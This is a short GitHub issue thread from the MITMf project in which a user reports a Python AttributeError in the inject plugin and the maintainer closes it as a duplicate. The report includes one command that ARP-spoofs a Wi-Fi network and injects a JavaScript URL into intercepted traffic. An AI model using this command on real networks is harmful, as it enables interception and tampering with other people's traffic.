### ISSUE TITLE
Cant sniff the traffic..

### ISSUE THREAD

**Issue by LukasBert0ni** [byt3bl33d3r/MITMf#322] opened 2016-06-27 15:24 UTC
`mitmf -i wlan0 --arp --spoof --inject --js-url "my.url.js" --gateway 192.168.1.1

File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
2016-06-27 18:25:35 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook

How can solve this error?

**Comment by byt3bl33d3r** [comment] 2016-12-13 03:34
Duplicate of #316

**Closed by byt3bl33d3r** 2016-12-13 03:34 UTC
